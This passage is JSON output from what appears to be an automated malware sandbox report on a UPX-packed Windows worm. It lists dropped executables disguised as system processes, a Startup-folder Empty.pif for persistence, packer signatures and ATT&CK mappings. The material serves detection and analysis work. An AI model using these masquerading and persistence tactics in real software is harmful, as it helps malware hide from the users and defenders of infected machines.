\"UPX0\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has an writable section named \"UPX1\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has an writable section named \".rsrc\"\n \"services.exe\" has an writable section named \"UPX0\"\n \"services.exe\" has an writable section named \"UPX1\"\n \"services.exe\" has an writable section named \".rsrc\"\n \"shell.exe\" has an writable section named \"UPX0\"\n \"shell.exe\" has an writable section named \"UPX1\"\n \"shell.exe\" has an writable section named \".rsrc\"\n \"4k51k4.exe\" has an writable section named \"UPX0\"\n \"4k51k4.exe\" has an writable section named \"UPX1\"\n \"4k51k4.exe\" has an writable section named \".rsrc\"\n \"IExplorer.exe\" has an writable section named \"UPX0\"\n \"IExplorer.exe\" has an writable section named \"UPX1\"\n \"IExplorer.exe\" has an writable section named \".rsrc\"\n \"CSRSS .exe\" has an writable section named \"UPX0\"\n \"CSRSS .exe\" has an writable section named \"UPX1\"\n \"CSRSS .exe\" has an writable section named \".rsrc\"\n \"New Folder.exe\" has an writable section named \"UPX0\"\n \"New Folder.exe\" has an writable section named \"UPX1\"\n \"New Folder.exe\" has an writable section named \".rsrc\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has an executable section named \"UPX0\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" has an executable section named \"UPX1\"\n \"services.exe\" has an executable section named \"UPX0\"\n \"services.exe\" has an executable section named \"UPX1\"\n \"shell.exe\" has an executable section named \"UPX0\"\n \"shell.exe\" has an executable section named \"UPX1\"\n \"4k51k4.exe\" has an executable section named \"UPX0\"\n \"4k51k4.exe\" has an executable section named \"UPX1\"\n \"IExplorer.exe\" has an executable section named \"UPX0\"\n \"IExplorer.exe\" has an executable section named \"UPX1\"\n \"CSRSS .exe\" has an executable section named \"UPX0\"\n \"CSRSS .exe\" has an executable section named \"UPX1\"\n \"New Folder.exe\" has an executable section named \"UPX0\"\n \"New Folder.exe\" has an executable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX1\"\n \"Empty.pif\" has an executable section named \"UPX0\"\n \"Empty.pif\" has an executable section named \"UPX1\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX0\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX1\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX0\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX1\"\n \"SERVICES.EXE\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"services.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"shell.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4k51k4.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IExplorer.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS .exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"New Folder.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Data HAPUBWS.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Empty.pif\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"WINLOGON.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SERVICES.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C388.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SMSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"LSASS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"MrHelloween.scr\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C38B.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9DA9B.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00001600]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00001600]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00001600]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00001600]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00001600]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Windows\\4k51k4.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\4k51k4.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe.cfg\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe.cfg\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe.Local\\\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" trying to access non-existent file \"C:\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" connecting to \"\\ThemeApiPort\"\n \"4k51k4.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"WINLOGON.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Windows\\4k51k4.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Windows\\System32\\MrHelloween.scr\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" queries basic process information of the \"C:\\Data HAPUBWS.exe\" (UID: 5240)\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\smss.exe\" (UID: 5240)\n \"4k51k4.exe\" queries basic process information of the \"C:\\share\\4K51K4\\Folder.htt\" (UID: 5188)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5188)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\" (UID: 4972)\n \"IExplorer.exe\" queries basic process information of the \"C:\\Puisi.txt\" (UID: 4972)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 5592)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5592)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\users\\desktop.ini\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\windows\\4k51k4.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\4k51k4.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\windows\\system32\\shell.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\windows\\system32\\iexplorer.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\windows\\4k51k4.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\4k51k4.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\lsass.exe\"\n \"0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\smss.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00001600]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\4k51k4.exe]- [targetUID: 00000000-00001600]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00001600]\n \"CSRSS .exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\4k51k4.exe]- [targetUID: 00000000-00001600]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00001600]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00001600]\n \"4K51K4.EXE.67A9C388.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00001600]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00001600]\n \"MrHelloween.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\MrHelloween.scr]- [targetUID: 00000000-00001600]\n \"IEXPLORER.EXE.67A9C38B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9DA9B.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- [targetUID: 00000000-00005188]\n \"Puisi.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\Puisi.txt]- [targetUID: 00000000-00001600]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: 00000000-00001600]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"4k51k4.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00001600]\n \"IEXPLORER.EXE.67A9DB78.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: 00000000-00001600]\n \"4K51K4.EXE.67A9DB2A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00001600]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004972)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004972)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00002712)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00004996)\n \"4k51k4.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00004996)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313336'}\" (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313256'}\" (UID: 00000000-00005664)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4313480'}\" (UID: 00000000-00005068)\n 